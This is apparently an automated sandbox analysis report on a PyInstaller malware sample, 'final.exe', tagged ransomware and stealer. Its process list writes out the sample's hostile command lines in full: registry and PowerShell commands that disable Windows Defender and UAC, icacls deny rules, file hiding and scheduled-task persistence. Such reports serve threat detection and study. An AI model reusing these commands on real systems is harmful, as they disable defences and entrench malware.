Malware Analysis Report

2025-06-15 23:27

Sample ID 250121-maa8ssykfs
Target final.exe
SHA256 a65610a00b2d16c046d140cc4bd9e634e62b1de6367c496221b9631545b8736a
Tags
defense_evasion discovery evasion execution exploit impact persistence privilege_escalation pyinstaller ransomware spyware stealer trojan
score
10/10

Analysis Overview

score
10/10

SHA256

a65610a00b2d16c046d140cc4bd9e634e62b1de6367c496221b9631545b8736a

Threat Level: Known bad

The file final.exe was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion execution exploit impact persistence privilege_escalation pyinstaller ransomware spyware stealer trojan

Modifies Windows Defender DisableAntiSpyware settings

Modifies Windows Defender Real-time Protection settings

UAC bypass

Deletes shadow copies

Drops file in Drivers directory

Possible privilege escalation attempt

Command and Scripting Interpreter: PowerShell

Disables cmd.exe use via registry modification

Disables Task Manager via registry modification

Disables RegEdit via registry modification

Executes dropped EXE

Modifies file permissions

Impair Defenses: Safe Mode Boot

Loads dropped DLL

Reads user/profile data of web browsers

Drops startup file

Drops desktop.ini file(s)

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Hide Artifacts: Hidden Files and Directories

Enumerates processes with tasklist

Browser Information Discovery

Detects Pyinstaller

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Enumerates physical storage devices

System Network Configuration Discovery: Wi-Fi Discovery

Suspicious use of FindShellTrayWindow

Kills process with taskkill

Interacts with shadow copies

System policy modification

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Scheduled Task/Job: Scheduled Task

Uses Volume Shadow Copy service COM API

Checks SCSI registry key(s)

Views/modifies file attributes

Suspicious behavior: EnumeratesProcesses

Modifies registry key

Enumerates system info in registry

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-01-21 10:15

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-01-21 10:15

Reported

2025-01-21 10:26

Platform

win11-20241007-en

Max time kernel

630s

Max time network

635s

Command Line

"C:\Users\Admin\AppData\Local\Temp\final.exe"

Signatures

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\$Sys-Manager\systemservice92.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SYSTEM32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SYSTEM32\reg.exe N/A

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Disables RegEdit via registry modification

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

defense_evasion

Disables cmd.exe use via registry modification

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" C:\$Sys-Manager\systemservice92.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\$Sys-Manager\systemservice92.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a4r3ezw3okvw9zam.exe C:\$Sys-Manager\systemservice92.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a4r3ezw3okvw9zam.exe C:\$Sys-Manager\systemservice92.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemservice92.exe C:\$Sys-Manager\systemservice92.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemservice92.exe C:\$Sys-Manager\systemservice92.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l3p5s4q51fqzem5z.exe C:\Users\Admin\AppData\Local\Temp\final.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l3p5s4q51fqzem5z.exe C:\Users\Admin\AppData\Local\Temp\final.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A

Impair Defenses: Safe Mode Boot

defense_evasion
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Minimal C:\$Sys-Manager\systemservice92.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\$Sys-Manager\desktop.ini C:\Users\Admin\AppData\Local\Temp\final.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A api64.ipify.org N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache C:\Windows\system32\vssvc.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName N/A N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\$Sys-Manager\systemservice92.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\srtasks.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4744 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Users\Admin\AppData\Local\Temp\final.exe
PID 4368 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 2696 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4368 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2224 wrote to memory of 5060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3316 wrote to memory of 3860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4904 wrote to memory of 3384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4380 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4380 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4572 wrote to memory of 2756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4368 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4108 wrote to memory of 416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4644 wrote to memory of 4188 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4368 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4020 wrote to memory of 4808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4020 wrote to memory of 4808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1456 wrote to memory of 4900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1456 wrote to memory of 4900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4380 wrote to memory of 112 N/A C:\Windows\system32\cmd.exe C:\$Sys-Manager\systemservice92.exe
PID 4380 wrote to memory of 112 N/A C:\Windows\system32\cmd.exe C:\$Sys-Manager\systemservice92.exe
PID 4368 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4380 wrote to memory of 1972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4380 wrote to memory of 1972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4368 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4876 wrote to memory of 560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4876 wrote to memory of 560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4972 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4972 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4368 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4760 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4760 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4380 wrote to memory of 5320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4380 wrote to memory of 5320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe

System policy modification

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStore = "1" C:\$Sys-Manager\systemservice92.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\final.exe

"C:\Users\Admin\AppData\Local\Temp\final.exe"

C:\Users\Admin\AppData\Local\Temp\final.exe

"C:\Users\Admin\AppData\Local\Temp\final.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /f"

C:\Windows\system32\reg.exe

reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\$Sys-Manager\systemservice.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager\systemservice92.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager\systemservice.bat""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager""

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /tn servicebat /tr C:\$Sys-Manager\systemservice.bat /sc onstart /f

C:\Windows\system32\attrib.exe

attrib +h "C:\$Sys-Manager\systemservice92.exe"

C:\Windows\system32\reg.exe

reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\attrib.exe

attrib +h "C:\$Sys-Manager\systemservice.bat"

C:\Windows\system32\attrib.exe

attrib +h "C:\$Sys-Manager"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\$Sys-Manager" /deny *S-1-1-0:(D)"

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\icacls.exe

icacls "C:\$Sys-Manager" /deny *S-1-1-0:(D)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f"

C:\$Sys-Manager\systemservice92.exe

"C:\$Sys-Manager\systemservice92.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\$Sys-Manager" /deny *S-1-5-32-544:(D)"

C:\Windows\system32\reg.exe

reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f

C:\Windows\system32\icacls.exe

icacls "C:\$Sys-Manager" /deny *S-1-5-32-544:(D)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\$Sys-Manager" /deny *S-1-5-32-545:(D)"

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f

C:\Windows\system32\icacls.exe

icacls "C:\$Sys-Manager" /deny *S-1-5-32-545:(D)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager\desktop.ini""

C:\Windows\system32\attrib.exe

attrib +h "C:\$Sys-Manager\desktop.ini"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\$Sys-Manager\systemservice92.exe

"C:\$Sys-Manager\systemservice92.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /f"

C:\Windows\system32\reg.exe

reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /f

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f"

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath 'C:\'"

C:\Windows\SYSTEM32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath 'D:\'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath '.exe'"

C:\Windows\SYSTEM32\netsh.exe

netsh wlan show profiles

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v SubmitSamplesConsent /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath '.bat'"

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath '.vbs'"

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableCloudProtection /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath '.py'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableCloudProtection /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath '.pyw'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "echo Y | winget list"

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Behavior Monitoring" /v DisableBehaviorMonitoring /f

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Behavior Monitoring" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableNetworkProtection /f

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableNetworkProtection /t REG_DWORD /d 1 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirusSignatures /f

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirusSignatures /t REG_DWORD /d 1 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAccess /f

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAccess /t REG_DWORD /d 1 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableSecurityCenter /f

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableSecurityCenter /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y "

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f"

C:\Windows\system32\reg.exe

reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /f /im firefox.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /f /im firefox.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\Users" /grant %username%:F"

C:\Windows\system32\icacls.exe

icacls "C:\Users" /grant Admin:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "schtasks /create /tn "ONEDRIVE-SERVICE" /tr "C:\Users\windowssystem\starter.exe" /sc onlogon /f"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "ONEDRIVE-SERVICE" /tr "C:\Users\windowssystem\starter.exe" /sc onlogon /f

C:\Windows\system32\cmd.exe

